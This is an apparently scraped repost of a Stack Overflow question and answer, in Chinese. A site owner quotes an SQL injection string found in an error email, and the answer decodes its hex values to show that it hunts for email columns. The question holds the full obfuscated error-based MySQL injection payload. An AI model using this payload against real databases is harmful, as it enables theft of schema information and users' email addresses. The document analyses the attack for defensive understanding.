gpt4 book ai didi

mysql - 这种SQL注入(inject)的目的是什么?

转载 作者:行者123 更新时间:2023-11-28 23:22:45 24 4
gpt4 key购买 nike

我有一个网站。如果有错误,我会向系统帐户发送电子邮件。我今天看到以下内容,我认为这是 SQL。我将不得不进行修复。有谁知道此人这样做的目的是什么?

AdID=50427 or 1=(/**/sElEcT 1 /**/fRoM(/**/sElEcT count(*),/**/cOnCaT((/**/sElEcT(/**/sElEcT(/**/sElEcT /**/cOnCaT(0x217e21,t./**/tAbLe_nAmE,0x217e21) /**/fRoM information_schema./**/sChEmAtA as d join information_schema./**/tAbLeS as t on t./**/tAbLe_sChEmA = d./**/sChEmA_NaMe join information_schema./**/cOlUmNs as c on c./**/tAbLe_sChEmA = d./**/sChEmA_NaMe and c./**/tAbLe_nAmE = t./**/tAbLe_nAmE /**/wHeRe not c./**/tAbLe_sChEmA in(0x696e666f726d6174696f6e5f736368656d61,0x6d7973716c) and d./**/sChEmA_NaMe = /**/dAtAbAsE() and c./**/cOlUmN_NaMe like 0x25656d61696c25 and not t./**/tAbLe_nAmE in(0x42524944455f54424c,0x42524944455f54424c5f505542,0x434f4e54414354,0x434f4e544143545f54424c,0x47524f4f4d5f54424c,0x47524f4f4d5f54424c5f505542,0x4f524445525f54424c,0x7068703132315f75736572735f64656c65746564,0x535542534352494245525f4c495354,0x555345525f44454c45544544,0x555345525f50524f46494c455f44454c45544544) /**/gRoUp/**/bY t./**/tAbLe_nAmE /**/lImIt 11,1)) /**/fRoM information_schema./**/tAbLeS /**/lImIt 0,1),floor(rand(0)*2))x /**/fRoM information_schema./**/tAbLeS /**/gRoUp/**/bY x)a) and 1=1

最佳答案

具体来说,它试图查找哪些非系统表具有包含 email 的列并且排除了以下表:

BRIDE_PUB   
BRIDE_TBL_PUB
CONTACT
CONTACT_TBL
GROOM_TBL
GROOM_TBL_PUB
ORDER_TBL
php121_users_deleted
SUBSCRIBER_LIST
USER_DELETED
USER_PROFILE_DELETED

我假设攻击者已经知道了。

所以基本上他们试图窃取您的电子邮件地址以作为邮件列表出售(这是典型的 SQL 注入(inject)攻击)。


仅供引用,这是我用来查看字符串的查询:

select
CAST(0x217e21 as varchar(99)),
CAST(0x696e666f726d6174696f6e5f736368656d61 as varchar(99)),
CAST(0x6d7973716c as varchar(99)),
CAST(0x25656d61696c25 as varchar(99)),
CAST(0x42524944455f54424c as varchar(99)),
CAST(0x42524944455f54424c5f505542 as varchar(99)),
CAST(0x434f4e54414354 as varchar(99)),
CAST(0x434f4e544143545f54424c as varchar(99)),
CAST(0x47524f4f4d5f54424c as varchar(99)),
CAST(0x47524f4f4d5f54424c5f505542 as varchar(99)),
CAST(0x4f524445525f54424c as varchar(99)),
CAST(0x7068703132315f75736572735f64656c65746564 as varchar(99)),
CAST(0x535542534352494245525f4c495354 as varchar(99)),
CAST(0x555345525f44454c45544544 as varchar(99)),
CAST(0x555345525f50524f46494c455f44454c45544544 as varchar(99))

(我在 MS SQL Server 上做的,不确定语法在 MySql 上是否完全相同)

关于mysql - 这种SQL注入(inject)的目的是什么?,我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/40809686/

24 4 0
Copyright 2021 - 2024 cfsdn All Rights Reserved 蜀ICP备2022000587号
广告合作:1813099741@qq.com 6ren.com